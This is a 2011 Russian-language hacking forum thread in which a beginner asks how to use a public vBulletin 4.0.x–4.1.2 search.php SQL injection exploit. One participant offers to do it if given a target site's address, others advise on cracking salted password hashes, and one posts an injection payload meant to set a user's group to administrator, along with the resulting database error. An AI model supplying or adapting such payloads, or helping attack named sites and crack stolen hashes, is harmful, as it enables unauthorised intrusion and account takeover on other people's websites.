ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   vBulletin 4.0.x => 4.1.2 exploit помощ нужна! (https://forum.antichat.xyz/showthread.php?t=277722)

Smesh 07.06.2011 12:27
Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#

C-r-A-c-K 07.06.2011 15:18
говори адрес сайта, помогу)

ra0cg 08.06.2011 01:37
Цитата:
Сообщение от Smesh
Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
Как вариант, просмотри видео "как уптреблят етот експлоит", к примеру с YouTube.

Sh0ck3R 16.06.2011 12:19
В каком формате получается пароль?(чтобы расшифровать)

fl00der 16.06.2011 12:37
Скорей всего в формате соленого хеша.

На форуме есть тема, попробуй закинуть хеши туда, может, расшифруют.

Export 20.06.2011 15:01
Какие еще запросы можно сделать?

На все запросы вылазит ошибка

Код:
Database error in vBulletin 4.1.2:

Invalid SQL:
SELECT DISTINCT socialgroupcategory.title from socialgroupcategory AS
                                socialgroupcategory WHERE socialgroupcategoryid IN (1) UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';);

MySQL Error  : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';)' at line 2
Error Number  : 1064
Request Date  : Monday, June 20th 2011 @ 03:57:50 PM
Error Date    : Monday, June 20th 2011 @ 03:57:50 PM
Script        : http://localhost/search.php?do=process
Referrer      : http://localhost/search.php
IP Address    : 127.0.0.1
Username      :
Classname    : vB_Database
MySQL Version : 5.1.40-community
Запрос SQL такой

Код:
&cat[0]=1) UPDATE user SET usergroupid=6 WHERE userid=2#
В чем моя ошибка?

PS Через Execute batch file в Navicat'e запрос проходит.


Время: 00:29